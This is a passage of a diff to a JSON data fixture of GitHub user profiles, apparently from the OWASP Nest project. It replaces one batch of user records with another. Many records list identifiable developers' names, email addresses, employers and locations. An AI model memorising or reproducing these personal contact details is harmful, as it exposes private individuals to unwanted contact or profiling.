"github.user", - "pk": 1311, + "pk": 6582, "fields": { - "nest_created_at": "2024-09-11T23:19:08.114Z", - "nest_updated_at": "2024-09-13T05:17:11.608Z", - "name": "David Meibusch", - "login": "dmeibusch", - "email": "David.Meibusch@oracle.com", - "avatar_url": "https://avatars.githubusercontent.com/u/28517621?v=4", - "company": "@oracle ", - "location": "GMT+10", + "nest_created_at": "2024-09-22T07:47:05.592Z", + "nest_updated_at": "2024-09-22T18:49:39.160Z", + "name": "Scott Addie", + "login": "scottaddie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10702007?v=4", + "company": "@Microsoft", + "location": "Madison, WI", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-05-07T23:49:25Z", - "updated_at": "2024-09-11T00:06:24Z", - "node_id": "MDQ6VXNlcjI4NTE3NjIx", - "bio": "", + "following_count": 1, + "followers_count": 393, + "public_gists_count": 64, + "public_repositories_count": 137, + "created_at": "2015-01-26T02:13:40Z", + "updated_at": "2024-09-17T11:26:38Z", + "node_id": "MDQ6VXNlcjEwNzAyMDA3", + "bio": "Principal Product Manager - Azure SDK", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Scott_Addie" } }, { "model": "github.user", - "pk": 1312, + "pk": 6583, "fields": { - "nest_created_at": "2024-09-11T23:19:08.958Z", - "nest_updated_at": "2024-09-11T23:28:51.085Z", - "name": "Hervé Boutemy", - "login": "hboutemy", - "email": "hboutemy@apache.org", - "avatar_url": "https://avatars.githubusercontent.com/u/237462?v=4", - "company": "", - "location": "Suresnes (France)", + "nest_created_at": "2024-09-22T07:47:05.924Z", + "nest_updated_at": "2024-09-22T18:49:39.479Z", + "name": "Matthew Peveler", + "login": "MasterOdin", + "email": "matt.peveler@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1845314?v=4", + "company": "@timescale", + "location": "Warren, VT", "collaborators_count": 0, - "following_count": 2, - "followers_count": 137, - "public_gists_count": 6, - "public_repositories_count": 299, - "created_at": "2010-04-05T20:48:09Z", - "updated_at": "2024-08-17T21:37:05Z", - "node_id": "MDQ6VXNlcjIzNzQ2Mg==", - "bio": "", - "is_hireable": false, - "twitter_username": "hboutemy" + "following_count": 27, + "followers_count": 162, + "public_gists_count": 13, + "public_repositories_count": 74, + "created_at": "2012-06-13T06:02:01Z", + "updated_at": "2024-09-19T00:01:14Z", + "node_id": "MDQ6VXNlcjE4NDUzMTQ=", + "bio": "Software Engineer, Comp. Sci. PhD", + "is_hireable": true, + "twitter_username": "mpeveler" } }, { "model": "github.user", - "pk": 1313, + "pk": 6584, "fields": { - "nest_created_at": "2024-09-11T23:19:11.047Z", - "nest_updated_at": "2024-09-11T23:19:11.047Z", - "name": "Boris Ivanov", - "login": "bors2908", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68551130?v=4", - "company": "", - "location": "Georgia", + "nest_created_at": "2024-09-22T07:47:06.239Z", + "nest_updated_at": "2024-09-22T18:49:39.788Z", + "name": "Michael C. Fanning", + "login": "michaelcfanning", + "email": "mikefan@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13526455?v=4", + "company": "Microsoft", + "location": "Redmond", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 11, + "followers_count": 42, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-07-20T14:01:54Z", - "updated_at": "2024-09-03T15:08:45Z", - "node_id": "MDQ6VXNlcjY4NTUxMTMw", - "bio": "Junk, forks and shared stuff.", + "public_repositories_count": 17, + "created_at": "2015-07-27T18:41:15Z", + "updated_at": "2024-04-30T15:06:51Z", + "node_id": "MDQ6VXNlcjEzNTI2NDU1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1314, + "pk": 6585, "fields": { - "nest_created_at": "2024-09-11T23:19:11.887Z", - "nest_updated_at": "2024-09-11T23:19:11.887Z", - "name": "Son Nguyen Ba", - "login": "sonnb", + "nest_created_at": "2024-09-22T07:47:06.558Z", + "nest_updated_at": "2024-09-22T18:49:40.094Z", + "name": "Felix Becker", + "login": "felixfbecker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1698122?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10532611?v=4", "company": "", - "location": "", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-05-02T08:39:18Z", - "updated_at": "2024-08-25T05:35:14Z", - "node_id": "MDQ6VXNlcjE2OTgxMjI=", + "following_count": 22, + "followers_count": 538, + "public_gists_count": 15, + "public_repositories_count": 190, + "created_at": "2015-01-14T14:45:44Z", + "updated_at": "2024-09-12T07:17:34Z", + "node_id": "MDQ6VXNlcjEwNTMyNjEx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "felixfbecker" } }, { "model": "github.user", - "pk": 1315, + "pk": 6586, "fields": { - "nest_created_at": "2024-09-11T23:19:13.165Z", - "nest_updated_at": "2024-09-11T23:19:13.165Z", - "name": "wvl", - "login": "wleese", + "nest_created_at": "2024-09-22T07:47:06.877Z", + "nest_updated_at": "2024-09-22T18:49:40.417Z", + "name": "Yi Hong Ang", + "login": "yihongang", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2562645?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12490533?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 54, - "created_at": "2012-10-15T08:48:06Z", - "updated_at": "2024-08-13T07:53:50Z", - "node_id": "MDQ6VXNlcjI1NjI2NDU=", + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2015-05-18T04:45:46Z", + "updated_at": "2024-08-07T02:43:54Z", + "node_id": "MDQ6VXNlcjEyNDkwNTMz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393128,74 +650577,99 @@ }, { "model": "github.user", - "pk": 1316, + "pk": 6587, "fields": { - "nest_created_at": "2024-09-11T23:19:15.329Z", - "nest_updated_at": "2024-09-18T18:58:24.518Z", - "name": "Tobias Langer", - "login": "empwilli", - "email": "empwilli@googlemail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/10295478?v=4", - "company": "", - "location": "Erlangen @ Germany", + "nest_created_at": "2024-09-22T07:47:07.193Z", + "nest_updated_at": "2024-09-22T18:49:40.722Z", + "name": "Matt Kruczek", + "login": "MCKRUZ", + "email": "kruz79@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1473014?v=4", + "company": "Tallan", + "location": "USA", "collaborators_count": 0, - "following_count": 23, - "followers_count": 6, + "following_count": 22, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2014-12-25T09:26:38Z", - "updated_at": "2024-08-14T07:23:14Z", - "node_id": "MDQ6VXNlcjEwMjk1NDc4", + "public_repositories_count": 18, + "created_at": "2012-02-25T14:33:31Z", + "updated_at": "2024-08-15T14:10:08Z", + "node_id": "MDQ6VXNlcjE0NzMwMTQ=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "MCKRUZ" } }, { "model": "github.user", - "pk": 1317, + "pk": 6588, "fields": { - "nest_created_at": "2024-09-11T23:19:16.591Z", - "nest_updated_at": "2024-09-12T01:42:50.506Z", - "name": "Sergey Khokhlov", - "login": "skhokhlov", - "email": "me@skhlv.nyc", - "avatar_url": "https://avatars.githubusercontent.com/u/1503649?v=4", - "company": "@citi", - "location": "London", + "nest_created_at": "2024-09-22T07:47:07.512Z", + "nest_updated_at": "2024-09-22T18:49:41.037Z", + "name": "Vlad Volkov", + "login": "vladyslavvolkov", + "email": "vlad@hiberbee.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1200484?v=4", + "company": "@Hiberbee @peoplevine", + "location": "Kyiv, Ukraine", "collaborators_count": 0, - "following_count": 7, - "followers_count": 13, - "public_gists_count": 15, - "public_repositories_count": 26, - "created_at": "2012-03-05T16:58:39Z", - "updated_at": "2024-09-09T10:24:13Z", - "node_id": "MDQ6VXNlcjE1MDM2NDk=", - "bio": "", + "following_count": 9, + "followers_count": 42, + "public_gists_count": 8, + "public_repositories_count": 21, + "created_at": "2011-11-16T20:48:12Z", + "updated_at": "2024-09-08T15:23:05Z", + "node_id": "MDQ6VXNlcjEyMDA0ODQ=", + "bio": "Site Reliability Engineer", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1318, + "pk": 6589, "fields": { - "nest_created_at": "2024-09-11T23:19:17.853Z", - "nest_updated_at": "2024-09-11T23:19:17.853Z", - "name": "Julien Graglia", - "login": "jgraglia", + "nest_created_at": "2024-09-22T07:47:07.821Z", + "nest_updated_at": "2024-09-22T18:49:41.342Z", + "name": "Homa Wong", + "login": "unional", + "email": "homawong@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3254987?v=4", + "company": "@timelywealth, Palo Alto Networks", + "location": "https://discord.gg/RwzcFpN5fv", + "collaborators_count": 0, + "following_count": 51, + "followers_count": 98, + "public_gists_count": 11, + "public_repositories_count": 257, + "created_at": "2013-01-13T00:46:05Z", + "updated_at": "2024-09-13T17:51:36Z", + "node_id": "MDQ6VXNlcjMyNTQ5ODc=", + "bio": "Clean Architect", + "is_hireable": false, + "twitter_username": "unional" + } +}, +{ + "model": "github.user", + "pk": 6590, + "fields": { + "nest_created_at": "2024-09-22T07:47:08.150Z", + "nest_updated_at": "2024-09-22T18:49:41.660Z", + "name": "Mike Lorbetske", + "login": "mlorbetske", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/754914?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1414993?v=4", + "company": "Syndigo", + "location": "Milwaukee, WI", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 10, - "public_repositories_count": 28, - "created_at": "2011-04-27T15:14:02Z", - "updated_at": "2024-09-01T08:52:17Z", - "node_id": "MDQ6VXNlcjc1NDkxNA==", + "following_count": 20, + "followers_count": 51, + "public_gists_count": 1, + "public_repositories_count": 80, + "created_at": "2012-02-07T05:59:16Z", + "updated_at": "2024-08-24T18:17:32Z", + "node_id": "MDQ6VXNlcjE0MTQ5OTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393203,24 +650677,24 @@ }, { "model": "github.user", - "pk": 1319, + "pk": 6591, "fields": { - "nest_created_at": "2024-09-11T23:19:27.952Z", - "nest_updated_at": "2024-09-11T23:19:27.952Z", - "name": "", - "login": "tarakg", + "nest_created_at": "2024-09-22T07:47:08.472Z", + "nest_updated_at": "2024-09-22T18:49:41.965Z", + "name": "Mohamed Hegazy", + "login": "mhegazy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16776582?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8000722?v=4", "company": "", - "location": "", + "location": "Redmond, Washington", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-01-19T11:17:59Z", - "updated_at": "2022-06-14T23:36:07Z", - "node_id": "MDQ6VXNlcjE2Nzc2NTgy", + "following_count": 21, + "followers_count": 482, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2014-06-26T23:41:32Z", + "updated_at": "2023-06-10T19:20:16Z", + "node_id": "MDQ6VXNlcjgwMDA3MjI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393228,74 +650702,74 @@ }, { "model": "github.user", - "pk": 1320, + "pk": 6592, "fields": { - "nest_created_at": "2024-09-11T23:19:33.460Z", - "nest_updated_at": "2024-09-12T01:26:31.414Z", - "name": "", - "login": "sitraj", - "email": "shounakitraj@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25792555?v=4", - "company": "", + "nest_created_at": "2024-09-22T07:47:08.808Z", + "nest_updated_at": "2024-09-22T18:49:42.282Z", + "name": "Matthew Manela", + "login": "mmanela", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/304410?v=4", + "company": "Sourcegraph", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 9, - "created_at": "2017-02-15T11:24:04Z", - "updated_at": "2024-07-06T17:16:13Z", - "node_id": "MDQ6VXNlcjI1NzkyNTU1", - "bio": "Software Security", + "following_count": 35, + "followers_count": 179, + "public_gists_count": 5, + "public_repositories_count": 75, + "created_at": "2010-06-13T23:27:27Z", + "updated_at": "2024-09-20T23:07:18Z", + "node_id": "MDQ6VXNlcjMwNDQxMA==", + "bio": "Engineering leader who is passionate about building high-performing teams and products", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mmanela" } }, { "model": "github.user", - "pk": 1321, + "pk": 6593, "fields": { - "nest_created_at": "2024-09-11T23:19:38.431Z", - "nest_updated_at": "2024-09-12T01:24:50.392Z", - "name": "Henrik Binggl", - "login": "bihe", - "email": "henrik.binggl@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/635852?v=4", + "nest_created_at": "2024-09-22T07:47:09.121Z", + "nest_updated_at": "2024-09-22T18:49:42.591Z", + "name": "Grant Timmerman", + "login": "grant", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/744973?v=4", "company": "", - "location": "Austria > Hallein", + "location": "SF", "collaborators_count": 0, - "following_count": 15, - "followers_count": 7, - "public_gists_count": 8, - "public_repositories_count": 49, - "created_at": "2011-02-24T11:58:32Z", - "updated_at": "2024-08-28T11:21:38Z", - "node_id": "MDQ6VXNlcjYzNTg1Mg==", - "bio": "Technology Enthusiast && SwDevNerd", + "following_count": 115, + "followers_count": 911, + "public_gists_count": 113, + "public_repositories_count": 295, + "created_at": "2011-04-22T00:58:10Z", + "updated_at": "2024-09-09T17:10:37Z", + "node_id": "MDQ6VXNlcjc0NDk3Mw==", + "bio": "Software engineer with a smile", "is_hireable": false, - "twitter_username": "" + "twitter_username": "granttimmerman" } }, { "model": "github.user", - "pk": 1322, + "pk": 6594, "fields": { - "nest_created_at": "2024-09-11T23:19:39.691Z", - "nest_updated_at": "2024-09-11T23:19:39.691Z", - "name": "Bryan Stadick", - "login": "bstadick", + "nest_created_at": "2024-09-22T07:47:09.458Z", + "nest_updated_at": "2024-09-22T18:49:42.912Z", + "name": "Anton Lobov", + "login": "zhuravlikjb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2057235?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4499495?v=4", "company": "", - "location": "Minneapolis, MN", + "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2012-07-28T16:28:14Z", - "updated_at": "2024-09-05T14:57:07Z", - "node_id": "MDQ6VXNlcjIwNTcyMzU=", + "public_repositories_count": 5, + "created_at": "2013-05-22T12:53:14Z", + "updated_at": "2021-12-27T09:42:35Z", + "node_id": "MDQ6VXNlcjQ0OTk0OTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393303,24 +650777,24 @@ }, { "model": "github.user", - "pk": 1323, + "pk": 6595, "fields": { - "nest_created_at": "2024-09-11T23:19:42.603Z", - "nest_updated_at": "2024-09-16T22:29:08.584Z", - "name": "", - "login": "rkg-mm", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12029804?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:09.815Z", + "nest_updated_at": "2024-09-22T18:49:43.240Z", + "name": "Stephan Aßmus", + "login": "stippi2", + "email": "stephan.assmus@gmx.de", + "avatar_url": "https://avatars.githubusercontent.com/u/59561325?v=4", + "company": "SAP", + "location": "Potsdam", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-04-20T08:06:50Z", - "updated_at": "2023-12-10T19:19:52Z", - "node_id": "MDQ6VXNlcjEyMDI5ODA0", + "public_repositories_count": 10, + "created_at": "2020-01-06T10:34:21Z", + "updated_at": "2024-08-21T14:01:59Z", + "node_id": "MDQ6VXNlcjU5NTYxMzI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393328,99 +650802,99 @@ }, { "model": "github.user", - "pk": 1324, + "pk": 6596, "fields": { - "nest_created_at": "2024-09-11T23:19:43.573Z", - "nest_updated_at": "2024-09-11T23:19:46.069Z", - "name": "Alastair McFarlane", - "login": "alitheg", + "nest_created_at": "2024-09-22T07:47:10.143Z", + "nest_updated_at": "2024-09-22T18:49:43.546Z", + "name": "Matt Bierner", + "login": "mjbvz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/450789?v=4", - "company": "@DuneTech", - "location": "Edinburgh", + "avatar_url": "https://avatars.githubusercontent.com/u/12821956?v=4", + "company": "Microsoft", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 8, - "public_gists_count": 2, - "public_repositories_count": 32, - "created_at": "2010-10-23T10:53:27Z", - "updated_at": "2024-09-05T16:49:02Z", - "node_id": "MDQ6VXNlcjQ1MDc4OQ==", - "bio": "CTO at @DuneTech\r\n", + "following_count": 1, + "followers_count": 977, + "public_gists_count": 5, + "public_repositories_count": 183, + "created_at": "2015-06-10T00:23:25Z", + "updated_at": "2024-09-21T01:51:37Z", + "node_id": "MDQ6VXNlcjEyODIxOTU2", + "bio": "", "is_hireable": false, - "twitter_username": "alitheg" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1325, + "pk": 6597, "fields": { - "nest_created_at": "2024-09-11T23:19:47.283Z", - "nest_updated_at": "2024-09-12T00:27:27.141Z", - "name": "Harald Sømnes Hanssen", - "login": "verzada", + "nest_created_at": "2024-09-22T07:47:10.453Z", + "nest_updated_at": "2024-09-22T18:49:43.849Z", + "name": "rentu", + "login": "SLdragon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10551898?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5545529?v=4", "company": "", - "location": "Tromsø", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2015-01-15T19:31:46Z", - "updated_at": "2024-08-19T09:49:10Z", - "node_id": "MDQ6VXNlcjEwNTUxODk4", - "bio": "A .Net developer living in Tromsø. \r\n", - "is_hireable": true, + "following_count": 3, + "followers_count": 100, + "public_gists_count": 5, + "public_repositories_count": 133, + "created_at": "2013-09-26T00:00:32Z", + "updated_at": "2024-06-24T08:34:13Z", + "node_id": "MDQ6VXNlcjU1NDU1Mjk=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1326, + "pk": 6598, "fields": { - "nest_created_at": "2024-09-11T23:19:48.556Z", - "nest_updated_at": "2024-09-11T23:19:48.556Z", - "name": "Alexander Alzate", - "login": "mr-zepol", + "nest_created_at": "2024-09-22T07:47:10.762Z", + "nest_updated_at": "2024-09-22T18:49:44.165Z", + "name": "Max Hauser", + "login": "foxriver76", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21176019?v=4", - "company": "@sonatype", - "location": "Colombia", + "avatar_url": "https://avatars.githubusercontent.com/u/25484431?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 7, + "followers_count": 56, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-08-22T14:19:46Z", - "updated_at": "2024-07-19T21:27:51Z", - "node_id": "MDQ6VXNlcjIxMTc2MDE5", - "bio": "Software Engineer", + "public_repositories_count": 125, + "created_at": "2017-02-01T15:05:47Z", + "updated_at": "2024-09-05T11:12:30Z", + "node_id": "MDQ6VXNlcjI1NDg0NDMx", + "bio": "I am one of the ioBroker Core developers. \r\n\r\nProfessionally I am a Full Stack Developer at itemis AG.", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1327, + "pk": 6599, "fields": { - "nest_created_at": "2024-09-11T23:19:51.139Z", - "nest_updated_at": "2024-09-11T23:19:51.139Z", - "name": "", - "login": "LapNik", + "nest_created_at": "2024-09-22T07:47:11.074Z", + "nest_updated_at": "2024-09-22T18:49:44.477Z", + "name": "Nick Graef", + "login": "ngraef", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73829722?v=4", - "company": "M-Files", + "avatar_url": "https://avatars.githubusercontent.com/u/1031317?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-11-02T11:44:55Z", - "updated_at": "2024-05-06T07:51:41Z", - "node_id": "MDQ6VXNlcjczODI5NzIy", + "following_count": 1, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 38, + "created_at": "2011-09-06T21:41:18Z", + "updated_at": "2024-08-13T20:48:04Z", + "node_id": "MDQ6VXNlcjEwMzEzMTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393428,49 +650902,49 @@ }, { "model": "github.user", - "pk": 1328, + "pk": 6600, "fields": { - "nest_created_at": "2024-09-11T23:19:52.370Z", - "nest_updated_at": "2024-09-16T22:28:51.275Z", - "name": "Chris Blyth", - "login": "BlythMeister", - "email": "blythmeister@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1046836?v=4", - "company": "@15below", - "location": "Lewes, UK", + "nest_created_at": "2024-09-22T07:47:11.723Z", + "nest_updated_at": "2024-09-22T18:49:45.107Z", + "name": "Ovidiu Cherecheș", + "login": "ovidiuch", + "email": "hello@ovidiu.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/250750?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 24, - "public_gists_count": 13, + "following_count": 1, + "followers_count": 569, + "public_gists_count": 11, "public_repositories_count": 53, - "created_at": "2011-09-13T09:17:55Z", - "updated_at": "2024-09-13T11:37:44Z", - "node_id": "MDQ6VXNlcjEwNDY4MzY=", - "bio": "Build & Deployment Manager @15below ", - "is_hireable": false, - "twitter_username": "BlythMeister" + "created_at": "2010-04-23T13:07:24Z", + "updated_at": "2024-09-13T16:26:01Z", + "node_id": "MDQ6VXNlcjI1MDc1MA==", + "bio": "", + "is_hireable": true, + "twitter_username": "skidding" } }, { "model": "github.user", - "pk": 1329, + "pk": 6601, "fields": { - "nest_created_at": "2024-09-11T23:19:53.623Z", - "nest_updated_at": "2024-09-11T23:19:53.623Z", - "name": "Adam C", - "login": "curnsey", + "nest_created_at": "2024-09-22T07:47:12.037Z", + "nest_updated_at": "2024-09-22T18:49:45.434Z", + "name": "", + "login": "AKorezin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11788574?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5399964?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-04-03T17:34:10Z", - "updated_at": "2023-02-08T14:49:05Z", - "node_id": "MDQ6VXNlcjExNzg4NTc0", + "public_repositories_count": 28, + "created_at": "2013-09-06T13:37:12Z", + "updated_at": "2024-08-23T04:49:44Z", + "node_id": "MDQ6VXNlcjUzOTk5NjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393478,49 +650952,49 @@ }, { "model": "github.user", - "pk": 1330, + "pk": 6602, "fields": { - "nest_created_at": "2024-09-11T23:19:54.900Z", - "nest_updated_at": "2024-09-11T23:19:54.900Z", - "name": "Philipp Ranft", - "login": "philipp-ranft", - "email": "philipp.ranft@kaleris.com", - "avatar_url": "https://avatars.githubusercontent.com/u/47754264?v=4", - "company": "Kaleris | Navis", - "location": "Flensburg, Germany", + "nest_created_at": "2024-09-22T07:47:12.359Z", + "nest_updated_at": "2024-09-22T18:49:45.753Z", + "name": "Arne Peirs", + "login": "Olympic1", + "email": "arnepeirs@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8020752?v=4", + "company": "UNILIN", + "location": "Zulte, Belgium", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-02-18T17:23:30Z", - "updated_at": "2024-05-27T15:33:19Z", - "node_id": "MDQ6VXNlcjQ3NzU0MjY0", - "bio": "", + "following_count": 14, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2014-06-29T21:16:49Z", + "updated_at": "2024-08-27T11:29:55Z", + "node_id": "MDQ6VXNlcjgwMjA3NTI=", + "bio": "29, Process Engineer @ UNILIN", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1331, + "pk": 6603, "fields": { - "nest_created_at": "2024-09-11T23:19:56.533Z", - "nest_updated_at": "2024-09-18T18:56:43.292Z", - "name": "Michael Tsfoni", - "login": "mtsfoni", + "nest_created_at": "2024-09-22T07:47:12.706Z", + "nest_updated_at": "2024-09-22T18:49:46.083Z", + "name": "Maxim Kropotov", + "login": "undeadcat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/80639729?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7509842?v=4", "company": "", - "location": "", + "location": "Tallinn", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2021-03-14T16:46:52Z", - "updated_at": "2024-09-18T12:10:28Z", - "node_id": "MDQ6VXNlcjgwNjM5NzI5", + "following_count": 13, + "followers_count": 12, + "public_gists_count": 20, + "public_repositories_count": 22, + "created_at": "2014-05-07T08:20:09Z", + "updated_at": "2024-09-16T07:26:24Z", + "node_id": "MDQ6VXNlcjc1MDk4NDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -393528,49 +651002,49 @@ }, { "model": "github.user", - "pk": 1332, + "pk": 6604, "fields": { - "nest_created_at": "2024-09-11T23:19:57.370Z", - "nest_updated_at": "2024-09-11T23:19:57.370Z", - "name": "Bert", - "login": "Bertk", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2315215?v=4", + "nest_created_at": "2024-09-22T07:47:13.025Z", + "nest_updated_at": "2024-09-22T18:49:46.411Z", + "name": "Juan Cruz Viotti", + "login": "jviotti", + "email": "jv@jviotti.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2192773?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2012-09-10T06:05:02Z", - "updated_at": "2024-09-04T10:45:56Z", - "node_id": "MDQ6VXNlcjIzMTUyMTU=", - "bio": "", + "following_count": 17, + "followers_count": 324, + "public_gists_count": 3, + "public_repositories_count": 24, + "created_at": "2012-08-21T23:32:58Z", + "updated_at": "2024-09-21T17:43:01Z", + "node_id": "MDQ6VXNlcjIxOTI3NzM=", + "bio": "Founder and CTO at @Intelligence-AI. Researcher at @sourcemeta. TSC member at @json-schema-org ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1333, + "pk": 6605, "fields": { - "nest_created_at": "2024-09-11T23:19:58.628Z", - "nest_updated_at": "2024-09-11T23:19:58.628Z", - "name": "Tristan Milnthorp", - "login": "tmilnthorp", + "nest_created_at": "2024-09-22T07:47:13.338Z", + "nest_updated_at": "2024-09-22T18:49:46.725Z", + "name": "Ajay Bhargav B", + "login": "ajaybhargavb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5693174?v=4", - "company": "Ansys, Inc.", - "location": "Pittsburgh, PA, USA", + "avatar_url": "https://avatars.githubusercontent.com/u/1579269?v=4", + "company": "", + "location": "Bellevue, WA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 9, + "followers_count": 212, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-10-15T16:50:58Z", - "updated_at": "2024-07-08T13:35:00Z", - "node_id": "MDQ6VXNlcjU2OTMxNzQ=", + "public_repositories_count": 32, + "created_at": "2012-03-27T09:57:02Z", + "updated_at": "2023-12-22T02:12:07Z", + "node_id": "MDQ6VXNlcjE1NzkyNjk=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -393578,99 +651052,99 @@ }, { "model": "github.user", - "pk": 1334, + "pk": 6606, "fields": { - "nest_created_at": "2024-09-11T23:19:59.905Z", - "nest_updated_at": "2024-09-11T23:19:59.905Z", + "nest_created_at": "2024-09-22T07:47:13.650Z", + "nest_updated_at": "2024-09-22T18:49:47.079Z", "name": "", - "login": "cwa-dr", + "login": "frogcjn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/126168929?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1777562?v=4", + "company": "-", + "location": "Beijing", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-23T12:47:09Z", - "updated_at": "2024-07-05T05:47:09Z", - "node_id": "U_kgDOB4UvYQ", - "bio": "", - "is_hireable": false, + "following_count": 7, + "followers_count": 22, + "public_gists_count": 3, + "public_repositories_count": 46, + "created_at": "2012-05-25T10:37:53Z", + "updated_at": "2024-09-20T11:26:45Z", + "node_id": "MDQ6VXNlcjE3Nzc1NjI=", + "bio": "Blablabla", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1335, + "pk": 6607, "fields": { - "nest_created_at": "2024-09-11T23:20:01.179Z", - "nest_updated_at": "2024-09-11T23:20:01.179Z", - "name": "", - "login": "gkrishna240988", + "nest_created_at": "2024-09-22T07:47:13.961Z", + "nest_updated_at": "2024-09-22T18:49:47.390Z", + "name": "William Holroyd", + "login": 